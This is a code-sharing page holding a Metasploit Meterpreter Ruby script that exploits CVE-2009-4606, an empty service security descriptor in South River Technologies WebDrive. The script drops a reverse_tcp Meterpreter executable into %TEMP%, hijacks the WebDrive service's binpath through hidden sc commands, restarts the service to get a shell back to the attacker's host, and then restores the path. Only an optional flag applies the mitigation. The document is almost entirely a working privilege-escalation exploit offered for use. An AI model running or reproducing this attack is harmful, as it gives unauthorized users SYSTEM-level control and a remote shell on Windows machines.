扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 |
## # South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation. # #This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. #Due to an empty security descriptor, a local attacker can gain elevated privileges. #Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3. #Vulnerability mitigation featured. # #Credit: # - Discovery - Nine:Situations:Group::bellick # - Meterpreter script - Trancer # #References: # - http://retrogod.altervista.org/9sg_south_river_priv.html # - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/ # - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606 # - http://osvdb.org/show/osvdb/59080 # #mtrancer[@]gmail.com #http://www.rec-sec.com ## # # Options # opts = Rex::Parser::Arguments.new( "-h"=> [ false,"This help menu"], "-m"=> [ false,"Mitigate"], "-r"=> [ true, "The IP of the system running Metasploit listening for the connect back"], "-p"=> [ true, "The port on the remote host where Metasploit is listening"] ) # # Default parameters # rhost = Rex::Socket.source_address("1.2.3.4") rport = 4444 sname = 'WebDriveService' pname = 'wdService.exe' # # Option parsing # opts.parse(args) do |opt, idx, val| case opt when "-h" print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.") print_line(opts.usage) raise Rex::Script::Completed when "-m" client.sys.process.get_processes().each do |m| if ( m['name'] == pname ) print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") # Set correct service security descriptor to mitigate the vulnerability print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.") client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'}) end end raise Rex::Script::Completed when "-r" rhost = val when "-p" rport = val.to_i end end client.sys.process.get_processes().each do |m| if ( m['name'] == pname ) print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") # Build out the exe payload. pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") pay.datastore['LHOST'] = rhost pay.datastore['LPORT'] = rport raw= pay.generate exe = Msf::Util::EXE.to_win32pe(client.framework, raw) # Place our newly created exe in %TEMP% tempdir = client.fs.file.expand_path("%TEMP%") tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" print_status("Sending EXE payload '#{tempexe}'.") fd = client.fs.file.new(tempexe, "wb") fd.write(exe) fd.close # Stop the vulnerable service print_status("Stopping service \"#{sname}\"...") client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'}) # Set exe payload as service binpath print_status("Setting \"#{sname}\" to #{tempexe}...") client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) sleep(1) # Restart the service print_status("Restarting the \"#{sname}\" service...") client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'}) # Our handler to recieve the callback. handler = client.framework.exploits.create("multi/handler") handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" handler.datastore['LHOST'] = rhost handler.datastore['LPORT'] = rport handler.datastore['ExitOnSession'] = false handler.exploit_simple( 'Payload' => handler.datastore['PAYLOAD'], 'RunAsJob' => true ) # Set service binpath back to normal client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'}) end end |
体验盒子
